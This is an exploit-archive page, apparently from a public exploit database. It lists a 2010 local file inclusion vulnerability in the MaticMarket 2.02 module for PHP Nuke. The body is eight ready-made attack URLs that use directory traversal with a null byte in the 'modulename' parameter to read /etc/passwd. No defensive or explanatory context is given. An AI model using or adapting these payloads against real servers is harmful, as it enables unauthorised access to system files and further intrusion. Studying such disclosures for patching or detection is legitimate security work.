MaticMarket 2.02 for PHP Nuke LFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MaticMarket 2.02 for PHP Nuke LFI Vulnerability
# Published : 2010-12-20
# Author : xer0x
# Previous Title : Joomla JE Auto Component 1.0 SQL Injection Vulnerability
# Next Title : Ero Auktion v2010 (item.php) SQL Injection Vulnerability

#MaticMarket 2.02 for PHP Nuke LFI Vulnerability
#Url: http://sourceforge.net/projects/maticmarket
#Author: xer0x
#Expl:
http://localhost/modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/deco/blanc/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/blanc/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/default/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/default/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/gold/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/gold/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00